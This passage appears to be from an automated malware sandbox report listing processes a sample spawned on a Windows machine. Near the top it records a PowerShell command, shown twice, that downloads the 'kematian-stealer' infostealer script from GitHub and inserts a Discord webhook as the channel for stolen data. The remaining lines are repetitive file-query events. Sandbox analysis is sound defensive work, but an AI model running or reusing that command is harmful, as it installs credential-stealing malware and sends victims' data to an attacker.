            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvxcelwx2krem6jwt15zqiyc' | out-file -filepath 'kematian.ps1' -encoding ascii"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile -executionpolicy bypass -command "$bytes = [system.io.file]::readallbytes('c:\users\user\desktop\pirates.bat') ; if (($bytes[0] -ne 0xff) -or ($bytes[1] -ne 0xfe)) { write-host 'the first 3 bytes of the file are not ff fe 0a.' ; taskkill /f /im cmd.exe }"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvxcelwx2krem6jwt15zqiyc' | out-file -filepath 'kematian.ps1' -encoding ascii" Jump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
